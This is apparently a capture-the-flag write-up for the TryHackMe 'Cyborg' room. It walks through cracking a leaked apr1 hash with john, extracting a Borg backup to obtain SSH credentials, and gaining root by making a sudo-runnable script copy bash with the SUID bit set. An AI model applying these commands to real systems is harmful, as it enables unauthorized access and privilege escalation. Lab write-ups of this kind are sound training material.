TryHackMe-Room: Cyborg
đ°Information of this box : A box involving encrypted archives, source code analysis and more.
đ°Step1: Scanning
After my nmap scan, i have this results:
nmap -Pn -A 10.10.176.158 -vvv
22/tcp open ssh syn-ack OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 db:b2:70:f3:07:ac:32:00:3f:81:b8:d0:3a:89:f3:65 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCtLmojJ45opVBHg89gyhjnTTwgEf8lVKKbUfVwmfqYP9gU3fWZD05rB/4p/qSoPbsGWvDUlSTUYMDcxNqaADH/nk58URDIiFMEM6dTiMa0gr
cKC5u4NRxOCtZGHTrZfiYLQKQkBsbmjbb5qpcuhYo/tzhVXsrr592Uph4iiUx8zhgfYhqgtehMG+UhzQRjnOBQ6GZmI4NyLQtHq7jSeu7ykqS9KEdkgwbBlGnDrC7ke1I9352lBb7jlsL/amXt2u
iRrBgsmz2AuF+ylGha97t6JkueMYHih4Pgn4X0WnwrcUOrY7q9bxB1jQx6laHrExPbz+7/Na9huvDkLFkr5Soh
| 256 68:e6:85:2f:69:65:5b:e7:c6:31:2c:8e:41:67:d7:ba (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBB5OB3VYSlOPJbOwXHV/je/alwaaJ8qljr3iLnKKGkwC4+PtH7IhMCAC3vim719GDimVEEGdQP
bxUF6eH2QZb20=
| 256 56:2c:79:92:ca:23:c3:91:49:35:fa:dd:69:7c:ca:ab (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIKlr5id6IfMeWb2ZC+LelPmOMm9S8ugHG2TtZ5HpFuZQ
80/tcp open http syn-ack Apache httpd 2.4.18 ((Ubuntu))
| http-methods:
|_ Supported Methods: POST OPTIONS GET HEAD
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.18 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
We have two ports open: 22 for SSH service and 80 for HTTP service !
For ssh the version is not vulnerable, at least for the moment!
đ°STEP 2 : Enumeration
Now navigate to HTTP port:
Nothing interesting here! All we have is that itâs an Ubuntu machine. OK ! I also looked at the source code (Crtl+u), but I found nothing! So I did a Gobuster scan on the box and found:
Two interesting repertoires : /admin and /etc
here is the content of each:
In the /admin repertoires I found things:
We notice a file named: archive.tar!
I download It !
and a very interesting paragraph :âOk sorry guys i think i messed something up, uhh i was playing around with the squid proxy i mentioned earlier. I decided to give up like i always do ahahaha sorry about that. I heard these proxy things are supposed to make your website secure but i barely know how to use it so im probably making it more insecure in the process. Might pass it over to the IT guys but in the meantime all the config files are laying about. And since i dont know how it works im not sure how to delete them hope they don't contain any confidential information lol. ther than that im pretty sure my backup "music_archive" is safe just to confirm.
â
it seems to speak of a certain âmusic_archive
â !
in the /etc directory I found :
we have a password:
music_archive:$apr1$BpZ.Q.1m$REDACTEDOVQTTn.
Letâs save it in a file âcrackme.txtâ
letâs use john to crack it, with the command
âââ(rootăżBOTNET)-[~/THM/Cyborg]
ââ# john --wordlist=/usr/share/wordlists/rockyou.txt crackme.txt
Warning: detected hash type "md5crypt", but the string is also recognized as "md5crypt-long"
Use the "--format=md5crypt-long" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (md5crypt, crypt(3) $1$ (and variants) [MD5 128/128 SSE2 4x3])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
squidward (music_archive)
1g 0:00:00:02 DONE (2024-02-09 20:54) 0.4739g/s 18472p/s 18472c/s 18472C/s 112806..samantha5
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
john --wordlist=/usr/share/wordlists/rockyou.txt crackme.txt
Ok ! whe have the password for âmusic_archiveâ !
letâs go back to the tar archive âarchive.tarâ that I downloaded!
I decompressed it with the command:
tar -xvf archive.tar
we have this : home/field/dev/final_archive/
We have a username: field
and we notice the file final_archive !
inside I noticed a README file!
and I opened it!
Its talking about some Borg backups! but if I remember correctly he also
talked about backups in the âmusic_archiveâ folder
Letâs do a little research on Borg!
What is borg ?
BorgBackup (short: Borg) is a deduplicating backup program. Optionally, it supports compression and authenticated encryption.
The main goal of Borg is to provide an efficient and secure way to backup data. The data deduplication technique used makes Borg suitable for daily backups since only changes are stored. The authenticated encryption technique makes it suitable for backups to not fully trusted targets.
First letâs install borg with:
apt install borgbackup
Next on the README is the documentation for borgbackup! I went and found:
# Extract entire archive
$ borg extract /path/to/repo::my-files
# Extract entire archive and list files while processing
$ borg extract --list /path/to/repo::my-files
# Verify whether an archive could be successfully extracted, but do not write files to disk
$ borg extract --dry-run /path/to/repo::my-files
# Extract the "src" directory
$ borg extract /path/to/repo::my-files home/USERNAME/src
# Extract the "src" directory but exclude object files
$ borg extract /path/to/repo::my-files home/USERNAME/src --exclude '*.o'
# Restore a raw device (must not be active/in use/mounted at that time)
$ borg extract --stdout /path/to/repo::my-sdx | dd of=/dev/sdx bs=10M
on the official documentation:
I use that :
borg extract /path/to/repo::my-files
borg extract home/field/dev/final_archive/::music_archive
Be sure to be in the correct directory containing the /home directory!
Then Iâm prompted to enter the password and thatâs it!
I go back to the /home folder and use the âtreeâ command:
âââ(rootăżBOTNET)-[~/THM/Cyborg/home]
ââ# tree
.
|-- alex
| |-- Desktop
| | `-- secret.txt
| |-- Documents
| | `-- note.txt
| |-- Downloads
| |-- Music
| |-- Pictures
| |-- Public
| |-- Templates
| `-- Videos
`-- field
`-- dev
`-- final_archive
|-- README
|-- config
|-- data
| `-- 0
| |-- 1
| |-- 3
| |-- 4
| `-- 5
|-- hints.5
|-- index.5
|-- integrity.5
`-- nonce
15 directories, 12 files
Yes I know, the suspicious things are: secret.txt and note.txt!
letâs see them:
the only interesting thing is these note.txt in: /home/alex/Documents
cat note.txt
credentials:
âââ(rootăżBOTNET)-[~/âŚ/Cyborg/home/alex/Documents]
ââ# cat note.txt
Wow I'm awful at remembering Passwords so I've taken my Friends advice and noting them down!
alex:REDACTED
We have Alexâs credentials! So the first thing that comes to mind is the SSH connection.
âââ(rootăżBOTNET)-[~/âŚ/Cyborg/home/alex/Documents]
ââ# ssh alex@10.10.176.158
The authenticity of host '10.10.176.158 (10.10.176.158)' can't be established.
ED25519 key fingerprint is SHA256:hJwt8CvQHRU+h3WUZda+Xuvsp1/od2FFuBvZJJvdSHs.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.176.158' (ED25519) to the list of known hosts.
alex@10.10.176.158's password:
Welcome to Ubuntu 16.04.7 LTS (GNU/Linux 4.15.0-128-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
27 packages can be updated.
0 updates are security updates.
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
alex@ubuntu:~$
đđđ Iâm logged in as Alex:
and can read the user.txt
cat user.txt
đ°STEP3: PRIVILEGE ESCALATION:
then the privesc:
This is what we present:
sudo -l
You can run this script as anyone without a password! Isnât that great đ!
Now letâs see our permissions to the file:
We see that user alex is the owner of the file! So we can modify the script a note porter:
Instead of a reverse shell weâre going to do something else todayđ:
I will add this code into the script:
Since the script will be executed as root; root will execute the code, So give its SUID to the /bin/bash file! But SUID confers the power to use a file as a user without being one!
cp /bin/bash ./ && chmod +s bash
Then we change the permissions to the script:
chmod 700 /etc/mp3backups/backup.sh
and run the script with sudo:
sudo /etc/mp3backups/backup.sh
We donât notice anything:
But just do :
ls -la
We notice a bash file with the SUID root đ!
So if I run the command:
./bash -p
Iâm still alex but with the egid and euid of root:
So I could use all the commands as root, but to have a prettier shell (which many people donât do afterwards)! If python is installed on the machine, you can do:
bash-4.3# python
Python 2.7.12 (default, Oct 5 2020, 13:56:01)
Type "help", "copyright", "credits" or "license" for more information.
>>> import os
>>> os.setuid(0)
>>> os.setgid(0)
>>> os.system("/bin/bash -p")
root@ubuntu:~#
These prettier as well !
finally we can read the âroot.txtâ file
cat root.txt
đ°đ°đ°Thank you for READING đđđđđđ